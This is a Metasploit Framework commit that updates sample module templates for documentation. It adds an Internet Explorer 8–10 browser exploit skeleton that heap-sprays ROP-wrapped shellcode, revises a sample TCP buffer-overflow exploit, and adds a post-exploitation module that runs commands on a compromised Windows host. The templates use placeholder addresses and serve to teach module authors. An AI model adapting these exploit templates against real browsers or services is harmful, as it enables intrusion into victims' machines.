Land rapid7#2084, samples and templates update

peterk143 · Jul 8, 2013 · 0acdc32 · 0acdc32
2 parents 2f72549 + 6871ff0
commit 0acdc32
Show file tree

Hide file tree

Showing 8 changed files with 340 additions and 21 deletions.
diff --git a/documentation/samples/modules/auxiliary/sample.rb b/documentation/samples/modules/auxiliary/sample.rb
@@ -15,19 +15,18 @@
 ###
 class Metasploit4 < Msf::Auxiliary
 
-	def initialize
-		super(
+	def initialize(info={})
+		super(update_info(info,
 			'Name'        => 'Sample Auxiliary Module',
-			'Version'     => '$Revision: 4419 $',
 			'Description' => 'Sample Auxiliary Module',
-			'Author'      => 'hdm',
+			'Author'      => ['hdm'],
 			'License'     => MSF_LICENSE,
 			'Actions'     =>
 				[
 					['Default Action'],
 					['Another Action']
 				]
-		)
+		))
 
 	end
 

diff --git a/documentation/samples/modules/encoders/sample.rb b/documentation/samples/modules/encoders/sample.rb
@@ -15,12 +15,12 @@ class Metasploit4 < Msf::Encoder
 
 	def initialize
 		super(
-			'Name'             => 'Sample encoder',
-			'Version'          => '$Revision$',
+			'Name'             => 'Sample Encoder',
 			'Description'      => %q{
 				Sample encoder that just returns the block it's passed
 				when encoding occurs.
 			},
+			'License'          => MSF_LICENSE,
 			'Author'           => 'skape',
 			'Arch'             => ARCH_ALL)
 	end

diff --git a/documentation/samples/modules/exploits/ie_browser.rb b/documentation/samples/modules/exploits/ie_browser.rb
@@ -0,0 +1,147 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+#   http://metasploit.com/framework/
+##
+
+require 'msf/core'
+
+
+###
+#
+# This exploit sample demonstrates how a typical browser exploit is written using commonly
+# used components such as: HttpServer, BrowserAutopwn, RopDB, DOM Element Property Spray.
+#
+###
+class Metasploit4 < Msf::Exploit::Remote
+	Rank = NormalRanking
+
+	include Msf::Exploit::Remote::HttpServer::HTML
+	include Msf::Exploit::RopDb
+	include Msf::Exploit::Remote::BrowserAutopwn
+
+	# Set :classid and :method for ActiveX exploits. For example:
+	# :classid    => "{C3B92104-B5A7-11D0-A37F-00A0248F0AF1}",
+	# :method     => "SetShapeNodeType",
+	autopwn_info({
+		:ua_name    => HttpClients::IE,
+		:ua_minver  => "8.0",
+		:ua_maxver  => "10.0",
+		:javascript => true,
+		:os_name    => OperatingSystems::WINDOWS,
+		:rank       => NormalRanking
+	})
+
+	def initialize(info={})
+		super(update_info(info,
+			'Name'           => "Module Name",
+			'Description'    => %q{
+				This template covers IE8/9/10, and uses the user-agent HTTP header to detect
+				the browser version.  Please note IE8 and newer may emulate an older IE version
+				in compatibility mode, in that case the module won't be able to detect the
+				browser correctly.
+			},
+			'License'        => MSF_LICENSE,
+			'Author'         => [ 'sinn3r' ],
+			'References'     =>
+				[
+					[ 'URL', 'http://metasploit.com' ]
+				],
+			'Platform'       => 'win',
+			'Targets'        =>
+				[
+					[ 'Automatic', {} ],
+					[ 'IE 8 on Windows XP SP3', { 'Rop' => :jre } ],
+					[ 'IE 8 on Windows Vista',  { 'Rop' => :jre } ],
+					[ 'IE 8 on Windows 7',      { 'Rop' => :jre } ],
+					[ 'IE 9 on Windows 7',      { 'Rop' => :jre } ],
+					[ 'IE 10 on Windows 8',     { 'Rop' => :jre } ]
+				],
+			'Payload'        =>
+				{
+					'BadChars'        => "\x00",  # js_property_spray
+					'StackAdjustment' => -3500
+				},
+			'Privileged'     => false,
+			'DisclosureDate' => "Apr 1 2013",
+			'DefaultTarget'  => 0))
+	end
+
+	def get_target(agent)
+		return target if target.name != 'Automatic'
+
+		nt = agent.scan(/Windows NT (\d\.\d)/).flatten[0] || ''
+		ie = agent.scan(/MSIE (\d)/).flatten[0] || ''
+
+		ie_name = "IE #{ie}"
+
+		case nt
+		when '5.1'
+			os_name = 'Windows XP SP3'
+		when '6.0'
+			os_name = 'Windows Vista'
+		when '6.1'
+			os_name = 'Windows 7'
+		when '6.2'
+			os_name = 'Windows 8'
+		end
+
+		targets.each do |t|
+			if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))
+				return t
+			end
+		end
+
+		nil
+	end
+
+	def get_payload(t)
+		stack_pivot = "\x41\x42\x43\x44"
+		code        = payload.encoded
+
+		case t['Rop']
+		when :msvcrt
+			print_status("Using msvcrt ROP")
+			rop_payload = generate_rop_payload('msvcrt', code, {'pivot'=>stack_pivot, 'target'=>'xp'})
+
+		else
+			print_status("Using JRE ROP")
+			rop_payload = generate_rop_payload('java', code, {'pivot'=>stack_pivot})
+		end
+
+		rop_payload
+	end
+
+
+	def get_html(t)
+		js_p = ::Rex::Text.to_unescape(get_payload(t), ::Rex::Arch.endian(t.arch))
+		html = %Q|
+			<script>
+			#{js_property_spray}
+
+			var s = unescape("#{js_p}");
+			sprayHeap({shellcode:s});
+			</script>
+		|
+
+		html.gsub(/^\t\t/, '')
+	end
+
+
+	def on_request_uri(cli, request)
+		agent = request.headers['User-Agent']
+		print_status("Requesting: #{request.uri}")
+
+		target = get_target(agent)
+		if target.nil?
+			print_error("Browser not supported, sending 404: #{agent}")
+			send_not_found(cli)
+			return
+		end
+
+		print_status("Target selected as: #{target.name}")
+		html = get_html(target)
+		send_response(cli, html, { 'Content-Type'=>'text/html', 'Cache-Control'=>'no-cache' })
+	end
+end
diff --git a/documentation/samples/modules/exploits/sample.rb b/documentation/samples/modules/exploits/sample.rb
@@ -22,13 +22,13 @@ class Metasploit4 < Msf::Exploit::Remote
 
 	def initialize(info = {})
 		super(update_info(info,
-			'Name'           => 'Sample exploit',
+			'Name'           => 'Sample Exploit',
 			'Description'    => %q{
 					This exploit module illustrates how a vulnerability could be exploited
 				in an TCP server that has a parsing bug.
 			},
-			'Author'         => 'skape',
-			'Version'        => '$Revision$',
+			'License'        => MSF_LICENSE,
+			'Author'         => ['skape'],
 			'References'     =>
 				[
 				],
@@ -41,26 +41,27 @@ def initialize(info = {})
 				[
 					# Target 0: Windows All
 					[
-						'Windows Universal',
+						'Windows XP/Vista/7/8',
 						{
 							'Platform' => 'win',
 							'Ret'      => 0x41424344
 						}
 					],
 				],
-			'DefaultTarget' => 0))
+			'DisclosureDate' => "Apr 1 2013",
+			'DefaultTarget'  => 0))
 	end
 
 	#
 	# The sample exploit just indicates that the remote host is always
 	# vulnerable.
 	#
 	def check
-		return Exploit::CheckCode::Vulnerable
+		Exploit::CheckCode::Vulnerable
 	end
 
 	#
-	# The exploit method connects to the remote service and sends 1024 A's
+	# The exploit method connects to the remote service and sends 1024 random bytes
 	# followed by the fake return address and then the payload.
 	#
 	def exploit
@@ -69,13 +70,13 @@ def exploit
 		print_status("Sending #{payload.encoded.length} byte payload...")
 
 		# Build the buffer for transmission
-		buf  = "A" * 1024
-		buf += [ target.ret ].pack('V')
-		buf += payload.encoded
+		buf  = rand_text_alpha(1024)
+		buf << [ target.ret ].pack('V')
+		buf << payload.encoded
 
 		# Send it off
 		sock.put(buf)
-		sock.get
+		sock.get_once
 
 		handler
 	end

diff --git a/documentation/samples/modules/nops/sample.rb b/documentation/samples/modules/nops/sample.rb
@@ -17,9 +17,9 @@ class Metasploit4 < Msf::Nop
 
 	def initialize
 		super(
-			'Name'        => 'Sample NOP generator',
-			'Version'     => '$Revision$',
+			'Name'        => 'Sample NOP Generator',
 			'Description' => 'Sample single-byte NOP generator',
+			'License'     => MSF_LICENSE,
 			'Author'      => 'skape',
 			'Arch'        => ARCH_X86)
 	end

diff --git a/documentation/samples/modules/payloads/singles/sample.rb b/documentation/samples/modules/payloads/singles/sample.rb
@@ -19,8 +19,8 @@ module Metasploit4
 	def initialize(info = {})
 		super(update_info(info,
 			'Name'          => 'Debugger Trap',
-			'Version'       => '$Revision$',
 			'Description'   => 'Causes a debugger trap exception through int3',
+			'License'       => MSF_LICENSE,
 			'Author'        => 'skape',
 			'Platform'      => 'win',
 			'Arch'          => ARCH_X86,

diff --git a/documentation/samples/modules/post/sample.rb b/documentation/samples/modules/post/sample.rb
@@ -0,0 +1,40 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+require 'msf/core/post/common'
+
+###
+#
+# This post module sample shows how we can execute a command on the compromised machine
+#
+###
+class Metasploit4 < Msf::Post
+
+	include Msf::Post::Common
+
+	def initialize(info={})
+		super(update_info(info,
+			'Name'          => 'Sample Post Module',
+			'Description'   => %q{Sample Post Module},
+			'License'       => MSF_LICENSE,
+			'Author'        => [ 'sinn3r'],
+			'Platform'      => [ 'win'],
+			'SessionTypes'  => [ "shell", "meterpreter" ]
+		))
+	end
+
+	#
+	# This post module runs a ipconfig command and returns the output
+	#
+	def run
+		print_status("Executing ipconfig on remote machine")
+		o = cmd_exec("ipconfig")
+		print_line(o)
+	end
+
+end